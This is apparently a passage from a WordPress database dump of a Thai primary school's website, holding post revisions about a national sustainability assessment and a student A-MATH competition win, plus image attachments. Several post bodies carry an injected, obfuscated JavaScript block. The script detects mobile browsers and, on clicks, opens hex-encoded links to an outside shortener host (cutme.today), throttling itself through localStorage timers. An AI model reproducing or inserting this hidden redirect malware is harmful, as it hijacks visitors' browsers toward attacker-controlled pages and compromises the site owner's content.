_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','เมื่อวันที่ 10 สิงหาคม 2567 โรงเรียนอนุบาลวัดพระโต ได้รับการประเมิน ‘โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน‘ ระดับประเทศ โดยมี นายปรัชญา ตะภา ผู้อำนวยการวิทยาลัยเกษตรและเทคโนโลยีมหาสารคาม เป็นประธานการประเมิน','','inherit','closed','closed','','177-revision-v1','','','2024-08-15 10:51:59','2024-08-15 03:51:59','',177,'http://watprato.ssk.in.th/?p=183',0,'revision','',0),
(185,1,'2024-08-15 10:54:15','2024-08-15 03:54:15','','453971114_122167799222202781_3841640128629440766_n','','inherit','open','closed','','453971114_122167799222202781_3841640128629440766_n-2','','','2024-08-15 10:54:15','2024-08-15 03:54:15','',158,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/453971114_122167799222202781_3841640128629440766_n-1.jpg',0,'attachment','image/jpeg',0),
(186,1,'2024-08-15 10:54:44','2024-08-15 03:54:44','','454267525_122167799384202781_905961670854441852_n','','inherit','open','closed','','454267525_122167799384202781_905961670854441852_n-2','','','2024-08-15 10:54:44','2024-08-15 03:54:44','',158,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/454267525_122167799384202781_905961670854441852_n-1.jpg',0,'attachment','image/jpeg',0),
(187,1,'2024-08-15 10:54:48','2024-08-15 03:54:48','<!-- wp:generateblocks/container {\"uniqueId\":\"250207dd\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":171,\"sizeSlug\":\"large\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/454010015_122167799234202781_6887725117770515048_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-171\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":185,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/453971114_122167799222202781_3841640128629440766_n-1-1024x1024.jpg\" alt=\"\" class=\"wp-image-185\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":186,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/454267525_122167799384202781_905961670854441852_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-186\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','การแข่งขัน A-MATH ประจำปี 2567 โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับนักเรียนคนเก่ง ✨ เด็กหญิงกชพรรณ ชาตรูปไพศาล เด็กหญิงศศินิภา ทองพิทักษ์ ได้รับรางวัลชนะเลิศการแข่งขัน A-MATH ประจาปี 2567 “ฝึกความคิดพิชิตสมอง ท้าประลอง A-MATH” ระดับประถมศึกษาปีที่ 1-6 จัดโดย สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1','','inherit','closed','closed','','158-revision-v1','','','2024-08-15 10:54:48','2024-08-15 03:54:48','',158,'http://watprato.ssk.in.th/?p=187',0,'revision','',0),
(189,2,'2024-08-15 11:07:03','2024-08-15 04:07:03','<!-- wp:paragraph -->\n<p><a href=\"https://www.facebook.com/photo/?fbid=122167462832202781&amp;set=pcb.122167462958202781&amp;__cft__[0]=AZW5vAZWYLNOc-3NxaBIh0RP9dBscHB9PcwqD9CTLy8zM1_7Afpf3avTOKhMqyebNCdXmEXvGbIRFR8xVUbjB7zsDkLX4D0SVUrSzZ4F_CWA332v77NfmbZqq9laToThl5nee5vwbVKENOooZWC1OZzbLX1I3B2qTWQNYnmUF8K1GW4lLq0tqGK11GFc81LfNkRmOD2YUy4GygFn2Fa7kS7q&amp;__tn__=*bH-R\"></a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image\"><a href=\"https://www.facebook.com/photo/?fbid=122167462832202781&amp;set=pcb.122167462958202781&amp;__cft__[0]=AZW5vAZWYLNOc-3NxaBIh0RP9dBscHB9PcwqD9CTLy8zM1_7Afpf3avTOKhMqyebNCdXmEXvGbIRFR8xVUbjB7zsDkLX4D0SVUrSzZ4F_CWA332v77NfmbZqq9laToThl5nee5vwbVKENOooZWC1OZzbLX1I3B2qTWQNYnmUF8K1GW4lLq0tqGK11GFc81LfNkRmOD2YUy4GygFn2Fa7kS7q&amp;__tn__=*bH-R\"><img src=\"https://scontent.fnak1-1.fna.fbcdn.net/v/t39.30808-6/453871324_122167463000202781_2692582071386976619_n.jpg?stp=dst-jpg_p600x600&amp;_nc_cat=100&amp;ccb=1-7&amp;_nc_sid=833d8c&amp;_nc_ohc=i7Wuo4G5aJAQ7kNvgGAn2o-&amp;_nc_ht=scontent.fnak1-1.fna&amp;oh=00_AYBiBJlNjHSucpb8Z2HlG4VygZ4XNos47NG-NJdQ9Vc_-Q&amp;oe=66C33C9E\" alt=\"\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p><a href=\"https://www.facebook.com/photo/?fbid=122167462862202781&amp;set=pcb.122167462958202781&amp;__cft__[0]=AZW5vAZWYLNOc-3NxaBIh0RP9dBscHB9PcwqD9CTLy8zM1_7Afpf3avTOKhMqyebNCdXmEXvGbIRFR8xVUbjB7zsDkLX4D0SVUrSzZ4F_CWA332v77NfmbZqq9laToThl5nee5vwbVKENOooZWC1OZzbLX1I3B2qTWQNYnmUF8K1GW4lLq0tqGK11GFc81LfNkRmOD2YUy4GygFn2Fa7kS7q&amp;__tn__=*bH-R\"></a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image\"><a href=\"https://www.facebook.com/photo/?fbid=122167462862202781&amp;set=pcb.122167462958202781&amp;__cft__[0]=AZW5vAZWYLNOc-3NxaBIh0RP9dBscHB9PcwqD9CTLy8zM1_7Afpf3avTOKhMqyebNCdXmEXvGbIRFR8xVUbjB7zsDkLX4D0SVUrSzZ4F_CWA332v77NfmbZqq9laToThl5nee5vwbVKENOooZWC1OZzbLX1I3B2qTWQNYnmUF8K1GW4lLq0tqGK11GFc81LfNkRmOD2YUy4GygFn2Fa7kS7q&amp;__tn__=*bH-R\"><img src=\"https://scontent.fnak1-1.fna.fbcdn.net/v/t39.30808-6/453906218_122167463012202781_5126343557949610556_n.jpg?stp=dst-jpg_p600x600&amp;_nc_cat=100&amp;ccb=1-7&amp;_nc_sid=833d8c&amp;_nc_ohc=kQRKxHK3JFsQ7kNvgF_VQlm&amp;_nc_ht=scontent.fnak1-1.fna&amp;oh=00_AYCT_ZF2lIpB_-6qW__sVUZy0CYgfgwfL-nyCX1xDUvdbw&amp;oe=66C34D0D\" alt=\"\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>ความรู้สึกทั้งหมด</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>23Kanokwan T Atthawan, Aksarapak Srijan&nbsp;และ&nbsp;คนอื่นๆ อีก 21 คน</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 